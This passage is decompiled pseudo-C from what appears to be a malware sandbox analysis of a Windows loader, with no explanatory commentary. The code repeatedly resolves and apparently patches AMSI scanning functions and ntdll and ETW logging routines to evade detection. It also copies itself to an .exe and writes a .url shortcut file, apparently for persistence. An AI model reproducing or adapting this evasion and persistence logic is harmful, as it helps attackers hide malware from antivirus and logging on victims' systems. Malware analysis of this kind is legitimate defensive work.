                                                                                                							_pop(_t3948);
                                                                                                							E02183690(_v2708, _t3378, _t3948, 0x2194b88);
                                                                                                							E02174A98( &_v2712, "ReportEventW");
                                                                                                							_push(_v2712);
                                                                                                							E02174A98( &_v2716, "advapi32");
                                                                                                							_pop(_t3951);
                                                                                                							E02183690(_v2716, _t3378, _t3951, 0x2194b88);
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2720, E02174D64(_v2724));
                                                                                                							_push(_v2720);
                                                                                                							_t3463 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2732, _t3463, 0x218e77c);
                                                                                                							E02174A98( &_v2728, E02174D64(_v2732));
                                                                                                							_pop(_t3956); // executed
                                                                                                							E02183690(_v2728, _t3378, _t3956, 0x2194b88); // executed
                                                                                                							E02174A98( &_v2736, "LdrGetDllHandle");
                                                                                                							_push(_v2736);
                                                                                                							_t2302 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2740, E02174D64(_t2302));
                                                                                                							_pop(_t3959);
                                                                                                							E02183690(_v2740, _t3378, _t3959, 0x2194b88);
                                                                                                							E02174A98( &_v2744, "NtPrivilegedServiceAuditAlarm");
                                                                                                							_push(_v2744);
                                                                                                							_t2311 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2748, E02174D64(_t2311));
                                                                                                							_pop(_t3962);
                                                                                                							E02183690(_v2748, _t3378, _t3962, 0x2194b88);
                                                                                                							E02174A98( &_v2752, "LdrQueryProcessModuleInformation");
                                                                                                							_push(_v2752);
                                                                                                							_t2320 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2756, E02174D64(_t2320));
                                                                                                							_pop(_t3965);
                                                                                                							E02183690(_v2756, _t3378, _t3965, 0x2194b88);
                                                                                                							E02174A98( &_v2760, "LdrLoadDll");
                                                                                                							_push(_v2760);
                                                                                                							_t2329 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2764, E02174D64(_t2329));
                                                                                                							_pop(_t3968);
                                                                                                							E02183690(_v2764, _t3378, _t3968, 0x2194b88);
                                                                                                							E02174A98( &_v2768, "NtOpenObjectAuditAlarm");
                                                                                                							_push(_v2768);
                                                                                                							_t2338 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2772, E02174D64(_t2338));
                                                                                                							_pop(_t3971);
                                                                                                							E02183690(_v2772, _t3378, _t3971, 0x2194b88);
                                                                                                							E02174A98( &_v2776, "NtPrivilegeObjectAuditAlarm");
                                                                                                							_push(_v2776);
                                                                                                							_t2347 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2780, E02174D64(_t2347));
                                                                                                							_pop(_t3974);
                                                                                                							E02183690(_v2780, _t3378, _t3974, 0x2194b88);
                                                                                                							E02174A98( &_v2784, "NtAccessCheckAndAuditAlarm");
                                                                                                							_push(_v2784);
                                                                                                							_t2356 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2788, E02174D64(_t2356));
                                                                                                							_pop(_t3977);
                                                                                                							E02183690(_v2788, _t3378, _t3977, 0x2194b88);
                                                                                                							E02174A98( &_v2792, "NtAccessCheck");
                                                                                                							_push(_v2792);
                                                                                                							_t2365 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2796, E02174D64(_t2365));
                                                                                                							_pop(_t3980);
                                                                                                							E02183690(_v2796, _t3378, _t3980, 0x2194b88);
                                                                                                							E02174A98( &_v2800, "NtAllocateUuids");
                                                                                                							_push(_v2800);
                                                                                                							_t2374 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2804, E02174D64(_t2374));
                                                                                                							_pop(_t3983);
                                                                                                							E02183690(_v2804, _t3378, _t3983, 0x2194b88);
                                                                                                							E02174A98( &_v2808, "NtPrivilegeCheck");
                                                                                                							_push(_v2808);
                                                                                                							_t2383 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2812, E02174D64(_t2383));
                                                                                                							_pop(_t3986);
                                                                                                							E02183690(_v2812, _t3378, _t3986, 0x2194b88);
                                                                                                							E02174A98( &_v2816, "NtSetSecurityObject");
                                                                                                							_push(_v2816);
                                                                                                							_t2392 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2820, E02174D64(_t2392));
                                                                                                							_pop(_t3989);
                                                                                                							E02183690(_v2820, _t3378, _t3989, 0x2194b88);
                                                                                                							E02174A98( &_v2824, "NtQuerySecurityObject");
                                                                                                							_push(_v2824);
                                                                                                							_t2401 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2828, E02174D64(_t2401));
                                                                                                							_pop(_t3992);
                                                                                                							E02183690(_v2828, _t3378, _t3992, 0x2194b88);
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v2832, E02174D64(_v2836));
                                                                                                							_push(_v2832);
                                                                                                							_t3464 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v2844, _t3464, 0x218e77c);
                                                                                                							E02174A98( &_v2840, E02174D64(_v2844));
                                                                                                							_pop(_t3997); // executed
                                                                                                							E02183690(_v2840, _t3378, _t3997, 0x2194b88); // executed
                                                                                                							E02174A98( &_v2848, "NtCreateSection");
                                                                                                							_push(_v2848);
                                                                                                							_t2424 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2852, E02174D64(_t2424));
                                                                                                							_pop(_t4000);
                                                                                                							E02183690(_v2852, _t3378, _t4000, 0x2194b88);
                                                                                                							E02174A98( &_v2856, "NtOpenSection");
                                                                                                							_push(_v2856);
                                                                                                							_t2433 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2860, E02174D64(_t2433));
                                                                                                							_pop(_t4003);
                                                                                                							E02183690(_v2860, _t3378, _t4003, 0x2194b88);
                                                                                                							E02174A98( &_v2864, "NtMapViewOfSection");
                                                                                                							_push(_v2864);
                                                                                                							_t2442 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2868, E02174D64(_t2442));
                                                                                                							_pop(_t4006);
                                                                                                							E02183690(_v2868, _t3378, _t4006, 0x2194b88);
                                                                                                							E02174A98( &_v2872, "NtCreateFile");
                                                                                                							_push(_v2872);
                                                                                                							_t2451 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2876, E02174D64(_t2451));
                                                                                                							_pop(_t4009);
                                                                                                							E02183690(_v2876, _t3378, _t4009, 0x2194b88);
                                                                                                							E02174A98( &_v2880, "EtwEventWriteEx");
                                                                                                							_push(_v2880);
                                                                                                							_t2460 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2884, E02174D64(_t2460));
                                                                                                							_pop(_t4012);
                                                                                                							E02183690(_v2884, _t3378, _t4012, 0x2194b88);
                                                                                                							E02174A98( &_v2888, "NtOpenFile");
                                                                                                							_push(_v2888);
                                                                                                							_t2469 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2892, E02174D64(_t2469));
                                                                                                							_pop(_t4015);
                                                                                                							E02183690(_v2892, _t3378, _t4015, 0x2194b88);
                                                                                                							E02174A98( &_v2896, "EtwEventWrite");
                                                                                                							_push(_v2896);
                                                                                                							_t2478 =  *0x2194bb8; // 0x3e09b08
                                                                                                							E02174A98( &_v2900, E02174D64(_t2478));
                                                                                                							_pop(_t4018);
                                                                                                							E02183690(_v2900, _t3378, _t4018, 0x2194b88);
                                                                                                							ExitProcess(0); // executed
                                                                                                							goto L62;
                                                                                                						} else {
                                                                                                							_push( *0x2194b84);
                                                                                                							_push(0x218e8d8);
                                                                                                							_push("Null");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1432, E02174D64(_v1436));
                                                                                                							_t2784 = E021780F8(_v1432);
                                                                                                							__eflags = _t2784;
                                                                                                							if(_t2784 != 0) {
                                                                                                								goto L37;
                                                                                                							} else {
                                                                                                								E02174A98( &_v1440, "C:\\Windows\\SysWOW64");
                                                                                                								_t2788 = E0217811C(_v1440);
                                                                                                								__eflags = _t2788;
                                                                                                								if(_t2788 == 0) {
                                                                                                									goto L37;
                                                                                                								} else {
                                                                                                									_push(0x218e77c);
                                                                                                									_push( *0x2194bb0);
                                                                                                									_push("OpenSession");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v1444, E02174D64(_v1448));
                                                                                                									_push(_v1444);
                                                                                                									_t3484 =  *0x2194bb0; // 0x3e01b38
                                                                                                									E02174BB0( &_v1456, _t3484, 0x218e77c);
                                                                                                									E02174A98( &_v1452, E02174D64(_v1456));
                                                                                                									_pop(_t4127);
                                                                                                									E02183690(_v1452, _t3378, _t4127, 0x2194b88);
                                                                                                									_push(0x218e77c);
                                                                                                									_push( *0x2194bb0);
                                                                                                									_push("ScanBuffer");
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v1460, E02174D64(_v1464));
                                                                                                									_push(_v1460);
                                                                                                									_t3485 =  *0x2194bb0; // 0x3e01b38
                                                                                                									E02174BB0( &_v1472, _t3485, 0x218e77c);
                                                                                                									E02174A98( &_v1468, E02174D64(_v1472));
                                                                                                									_pop(_t4132);
                                                                                                									E02183690(_v1468, _t3378, _t4132, 0x2194b88);
                                                                                                									 *0x2194b8c = E02173C30(1);
                                                                                                									 *[fs:eax] = _t4337;
                                                                                                									E0217304C(0x64);
                                                                                                									E02177C4C( &_v1476);
                                                                                                									_t2824 =  *0x2194b8c; // 0x3dde990
                                                                                                									 *((intOrPtr*)( *_t2824 + 0x38))( *[fs:eax], 0x218c0d2, _t4336);
                                                                                                									E02174C24();
                                                                                                									E02174A98( &_v1480, E02174D64(_v1484));
                                                                                                									_t2831 =  *0x2194b8c; // 0x3dde990
                                                                                                									 *((intOrPtr*)( *_t2831 + 0x74))("Null", 0x218e8d8,  *0x2194b84);
                                                                                                									__eflags = 0;
                                                                                                									_pop(_t4139);
                                                                                                									 *[fs:eax] = _t4139;
                                                                                                									_push(E0218C0D9);
                                                                                                									_t2834 =  *0x2194b8c; // 0x3dde990
                                                                                                									return E02173C60(_t2834);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_push( *0x2194b84);
                                                                                                						_push(0x218e8d8);
                                                                                                						_t2836 =  *0x2194bd4; // 0x3e09388
                                                                                                						E02188E04(_t2836, _t3378, _t3434,  &_v776, _t4332, 0x2194b88);
                                                                                                						_push(_v776);
                                                                                                						_push(".url");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v768, E02174D64(_v772));
                                                                                                						if(E021780F8(_v768) != 0) {
                                                                                                							goto L32;
                                                                                                						} else {
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("Initialize");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v780, E02174D64(_v784));
                                                                                                							_push(_v780);
                                                                                                							_t3490 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v792, _t3490, 0x218e77c);
                                                                                                							E02174A98( &_v788, E02174D64(_v792));
                                                                                                							_pop(_t4147); // executed
                                                                                                							E02183690(_v788, _t3378, _t4147, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v796, E02174D64(_v800));
                                                                                                							_push(_v796);
                                                                                                							_t3491 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v808, _t3491, 0x218e77c);
                                                                                                							E02174A98( &_v804, E02174D64(_v808));
                                                                                                							_pop(_t4152); // executed
                                                                                                							E02183690(_v804, _t3378, _t4152, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v812, E02174D64(_v816));
                                                                                                							_push(_v812);
                                                                                                							_t3492 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v824, _t3492, 0x218e77c);
                                                                                                							E02174A98( &_v820, E02174D64(_v824));
                                                                                                							_pop(_t4157); // executed
                                                                                                							E02183690(_v820, _t3378, _t4157, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v828, E02174D64(_v832));
                                                                                                							_push(_v828);
                                                                                                							_t3493 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v840, _t3493, 0x218e77c);
                                                                                                							E02174A98( &_v836, E02174D64(_v840));
                                                                                                							_pop(_t4162); // executed
                                                                                                							E02183690(_v836, _t3378, _t4162, 0x2194b88); // executed
                                                                                                							_push( *0x2194b84);
                                                                                                							_push(0x218e8d8);
                                                                                                							_push( *0x2194bd4);
                                                                                                							E02174C24();
                                                                                                							E02174A98(0x2194bd0, E02174D64(_v844));
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("Initialize");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v848, E02174D64(_v852));
                                                                                                							_push(_v848);
                                                                                                							_t3494 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v860, _t3494, 0x218e77c);
                                                                                                							E02174A98( &_v856, E02174D64(_v860));
                                                                                                							_pop(_t4169); // executed
                                                                                                							E02183690(_v856, _t3378, _t4169, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v864, E02174D64(_v868));
                                                                                                							_push(_v864);
                                                                                                							_t3495 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v876, _t3495, 0x218e77c);
                                                                                                							E02174A98( &_v872, E02174D64(_v876));
                                                                                                							_pop(_t4174); // executed
                                                                                                							E02183690(_v872, _t3378, _t4174, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v880, E02174D64(_v884));
                                                                                                							_push(_v880);
                                                                                                							_t3496 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v892, _t3496, 0x218e77c);
                                                                                                							E02174A98( &_v888, E02174D64(_v892));
                                                                                                							_pop(_t4179); // executed
                                                                                                							E02183690(_v888, _t3378, _t4179, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v896, E02174D64(_v900));
                                                                                                							_push(_v896);
                                                                                                							_t3497 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v908, _t3497, 0x218e77c);
                                                                                                							E02174A98( &_v904, E02174D64(_v908));
                                                                                                							_pop(_t4184); // executed
                                                                                                							E02183690(_v904, _t3378, _t4184, 0x2194b88);
                                                                                                							_t2962 =  *0x2194bd0; // 0x3d954b8
                                                                                                							if((E021780F8(_t2962) ^ 0x00000001) == 1) {
                                                                                                								_push(0x218e77c);
                                                                                                								_push( *0x2194bb0);
                                                                                                								_push("Initialize");
                                                                                                								E02174C24();
                                                                                                								E02174A98( &_v912, E02174D64(_v916));
                                                                                                								_push(_v912);
                                                                                                								_t3520 =  *0x2194bb0; // 0x3e01b38
                                                                                                								E02174BB0( &_v924, _t3520, 0x218e77c);
                                                                                                								E02174A98( &_v920, E02174D64(_v924));
                                                                                                								_pop(_t4272); // executed
                                                                                                								E02183690(_v920, _t3378, _t4272, 0x2194b88); // executed
                                                                                                								_push(0x218e77c);
                                                                                                								_push( *0x2194bb0);
                                                                                                								_push("OpenSession");
                                                                                                								E02174C24();
                                                                                                								E02174A98( &_v928, E02174D64(_v932));
                                                                                                								_push(_v928);
                                                                                                								_t3521 =  *0x2194bb0; // 0x3e01b38
                                                                                                								E02174BB0( &_v940, _t3521, 0x218e77c);
                                                                                                								E02174A98( &_v936, E02174D64(_v940));
                                                                                                								_pop(_t4277); // executed
                                                                                                								E02183690(_v936, _t3378, _t4277, 0x2194b88); // executed
                                                                                                								_push(0x218e77c);
                                                                                                								_push( *0x2194bb0);
                                                                                                								_push("ScanBuffer");
                                                                                                								E02174C24();
                                                                                                								E02174A98( &_v944, E02174D64(_v948));
                                                                                                								_push(_v944);
                                                                                                								_t3522 =  *0x2194bb0; // 0x3e01b38
                                                                                                								E02174BB0( &_v956, _t3522, 0x218e77c);
                                                                                                								E02174A98( &_v952, E02174D64(_v956));
                                                                                                								_pop(_t4282); // executed
                                                                                                								E02183690(_v952, _t3378, _t4282, 0x2194b88);
                                                                                                								_t3235 =  *0x2194bd0; // 0x3d954b8
                                                                                                								E02174A98( &_v960, E02174D64(_t3235));
                                                                                                								_t3239 =  *0x2194b7c; // 0x3d65538, executed
                                                                                                								E021889A4(_t3239, _t3378, _v960, 0x2194b88); // executed
                                                                                                							}
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("Initialize");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v964, E02174D64(_v968));
                                                                                                							_push(_v964);
                                                                                                							_t3498 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v976, _t3498, 0x218e77c);
                                                                                                							E02174A98( &_v972, E02174D64(_v976));
                                                                                                							_pop(_t4189); // executed
                                                                                                							E02183690(_v972, _t3378, _t4189, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v980, E02174D64(_v984));
                                                                                                							_push(_v980);
                                                                                                							_t3499 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v992, _t3499, 0x218e77c);
                                                                                                							E02174A98( &_v988, E02174D64(_v992));
                                                                                                							_pop(_t4194); // executed
                                                                                                							E02183690(_v988, _t3378, _t4194, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v996, E02174D64(_v1000));
                                                                                                							_push(_v996);
                                                                                                							_t3500 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1008, _t3500, 0x218e77c);
                                                                                                							E02174A98( &_v1004, E02174D64(_v1008));
                                                                                                							_pop(_t4199); // executed
                                                                                                							E02183690(_v1004, _t3378, _t4199, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1012, E02174D64(_v1016));
                                                                                                							_push(_v1012);
                                                                                                							_t3501 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1024, _t3501, 0x218e77c);
                                                                                                							E02174A98( &_v1020, E02174D64(_v1024));
                                                                                                							_pop(_t4204); // executed
                                                                                                							E02183690(_v1020, _t3378, _t4204, 0x2194b88); // executed
                                                                                                							_push( *0x2194b84);
                                                                                                							_push(0x218e8d8);
                                                                                                							_push( *0x2194bd4);
                                                                                                							_push(".exe");
                                                                                                							E02174C24();
                                                                                                							E02174A98(0x21949c0, E02174D64(_v1028));
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1032, E02174D64(_v1036));
                                                                                                							_push(_v1032);
                                                                                                							_t3502 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1044, _t3502, 0x218e77c);
                                                                                                							E02174A98( &_v1040, E02174D64(_v1044));
                                                                                                							_pop(_t4211); // executed
                                                                                                							E02183690(_v1040, _t3378, _t4211, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1048, E02174D64(_v1052));
                                                                                                							_push(_v1048);
                                                                                                							_t3503 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1060, _t3503, 0x218e77c);
                                                                                                							E02174A98( &_v1056, E02174D64(_v1060));
                                                                                                							_pop(_t4216); // executed
                                                                                                							E02183690(_v1056, _t3378, _t4216, 0x2194b88); // executed
                                                                                                							_t3054 =  *0x21949c0; // 0x3df34f0
                                                                                                							_t3055 = E02174D64(_t3054);
                                                                                                							E02172FC4(0,  &_v1064);
                                                                                                							CopyFileA(E02174D64(_v1064), _t3055, 0xffffffff); // executed
                                                                                                							E02174A98( &_v1068, "CopyFileA");
                                                                                                							_push(_v1068);
                                                                                                							E02174A98( &_v1072, "kernel32");
                                                                                                							_pop(_t4220);
                                                                                                							E02183690(_v1072, _t3378, _t4220, 0x2194b88);
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1076, E02174D64(_v1080));
                                                                                                							_push(_v1076);
                                                                                                							_t3504 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1088, _t3504, 0x218e77c);
                                                                                                							E02174A98( &_v1084, E02174D64(_v1088));
                                                                                                							_pop(_t4225); // executed
                                                                                                							E02183690(_v1084, _t3378, _t4225, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1092, E02174D64(_v1096));
                                                                                                							_push(_v1092);
                                                                                                							_t3505 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1104, _t3505, 0x218e77c);
                                                                                                							E02174A98( &_v1100, E02174D64(_v1104));
                                                                                                							_pop(_t4230); // executed
                                                                                                							E02183690(_v1100, _t3378, _t4230, 0x2194b88); // executed
                                                                                                							_t3097 =  *0x21949c0; // 0x3df34f0
                                                                                                							E02188718(_t3097, _t3378, 0x218e91c, 0x218e8d8, _t4332, 0x2194b88,  &_v1108);
                                                                                                							E021748F4(0x21949d4, _v1108);
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1112, E02174D64(_v1116));
                                                                                                							_push(_v1112);
                                                                                                							_t3507 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1124, _t3507, 0x218e77c);
                                                                                                							E02174A98( &_v1120, E02174D64(_v1124));
                                                                                                							_pop(_t4237); // executed
                                                                                                							E02183690(_v1120, _t3378, _t4237, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1128, E02174D64(_v1132));
                                                                                                							_push(_v1128);
                                                                                                							_t3508 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1140, _t3508, 0x218e77c);
                                                                                                							E02174A98( &_v1136, E02174D64(_v1140));
                                                                                                							_pop(_t4242); // executed
                                                                                                							E02183690(_v1136, _t3378, _t4242, 0x2194b88); // executed
                                                                                                							 *0x2194b8c = E02173C30(1);
                                                                                                							_push(_t4336);
                                                                                                							_push(0x218b800);
                                                                                                							_push( *[fs:eax]);
                                                                                                							 *[fs:eax] = _t4337;
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("Initialize");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1144, E02174D64(_v1148));
                                                                                                							_push(_v1144);
                                                                                                							_t3509 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1156, _t3509, 0x218e77c);
                                                                                                							E02174A98( &_v1152, E02174D64(_v1156));
                                                                                                							_pop(_t4248); // executed
                                                                                                							E02183690(_v1152, _t3378, _t4248, 0x2194b88); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanString");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1160, E02174D64(_v1164));
                                                                                                							_push(_v1160);
                                                                                                							_t3510 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0( &_v1172, _t3510, 0x218e77c);
                                                                                                							E02174A98( &_v1168, E02174D64(_v1172));
                                                                                                							_pop(_t4253); // executed
                                                                                                							E02183690(_v1168, _t3378, _t4253, 0x2194b88); // executed
                                                                                                							_t3160 =  *0x2194b8c; // 0x3dde990
                                                                                                							 *((intOrPtr*)( *_t3160 + 0x38))();
                                                                                                							E02174C24();
                                                                                                							_t3163 =  *0x2194b8c; // 0x3dde990
                                                                                                							 *((intOrPtr*)( *_t3163 + 0x38))(0x218e958,  *0x21949d4, "URL=file:\"");
                                                                                                							E0217304C(0x3a);
                                                                                                							E02177C4C( &_v1184);
                                                                                                							E02174BB0( &_v1180, _v1184, "IconIndex=");
                                                                                                							_t3171 =  *0x2194b8c; // 0x3dde990
                                                                                                							 *((intOrPtr*)( *_t3171 + 0x38))();
                                                                                                							E0217304C(0x63);
                                                                                                							E02177C4C( &_v1192);
                                                                                                							E02174BB0( &_v1188, _v1192, "HotKey=");
                                                                                                							_t3179 =  *0x2194b8c; // 0x3dde990
                                                                                                							 *((intOrPtr*)( *_t3179 + 0x38))();
                                                                                                							_t3181 =  *0x2194bd4; // 0x3e09388
                                                                                                							E02188E04(_t3181, _t3378,  *_t3179,  &_v1204, _t4332, 0x2194b88);
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v1196, E02174D64(_v1200));
                                                                                                							_t3188 =  *0x2194b8c; // 0x3dde990
                                                                                                							 *((intOrPtr*)( *_t3188 + 0x74))(".url", _v1204, 0x218e8d8,  *0x2194b84);
                                                                                                							_pop(_t4267);
                                                                                                							 *[fs:eax] = _t4267;
                                                                                                							_push(E0218B807);
                                                                                                							_t3191 =  *0x2194b8c; // 0x3dde990
                                                                                                							return E02173C60(_t3191); // executed
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L1:
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_t3383 = _t3383 - 1;
                                                                                                				if(_t3383 != 0) {
                                                                                                					goto L1;
                                                                                                				} else {
                                                                                                					_push(__ebx);
                                                                                                					_push(_t4336);
                                                                                                					_push(0x218e742);
                                                                                                					_push( *[fs:eax]);
                                                                                                					 *[fs:eax] = _t4337;
                                                                                                					E02173024();
                                                                                                					_t1159 = E0217304C(0x38c);
                                                                                                					_push(_t1159); // executed
                                                                                                					L021858FC(); // executed
                                                                                                					if(_t1159 == 0) {
                                                                                                						_t1161 = E0217304C(0x38c);
                                                                                                						_push(_t1161);
                                                                                                						L021858FC();
                                                                                                						__eflags = _t1161;
                                                                                                						if(_t1161 == 0) {
                                                                                                							E021748F4(0x2194bb0, 0x218e770);
                                                                                                						} else {
                                                                                                							E021748F4(0x2194bb0, "5E5CDDEE");
                                                                                                						}
                                                                                                					} else {
                                                                                                						E021748F4(0x21949d8, "5E5CDDEE");
                                                                                                					}
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v8, E02174D64(_v12));
                                                                                                					_push(_v8);
                                                                                                					_t3384 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v20, _t3384, 0x218e77c);
                                                                                                					E02174A98( &_v16, E02174D64(_v20));
                                                                                                					_pop(_t3534); // executed
                                                                                                					E02183690(_v16, _t3375, _t3534, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanString");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v24, E02174D64(_v28));
                                                                                                					_push(_v24);
                                                                                                					_t3385 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v36, _t3385, 0x218e77c);
                                                                                                					E02174A98( &_v32, E02174D64(_v36));
                                                                                                					_pop(_t3539); // executed
                                                                                                					E02183690(_v32, _t3375, _t3539, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("Initialize");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v40, E02174D64(_v44));
                                                                                                					_push(_v40);
                                                                                                					_t3386 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v52, _t3386, 0x218e77c);
                                                                                                					E02174A98( &_v48, E02174D64(_v52));
                                                                                                					_pop(_t3544); // executed
                                                                                                					E02183690(_v48, _t3375, _t3544, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v56, E02174D64(_v60));
                                                                                                					_push(_v56);
                                                                                                					_t3387 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v68, _t3387, 0x218e77c);
                                                                                                					E02174A98( &_v64, E02174D64(_v68));
                                                                                                					_pop(_t3549); // executed
                                                                                                					E02183690(_v64, _t3375, _t3549, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("Initialize");
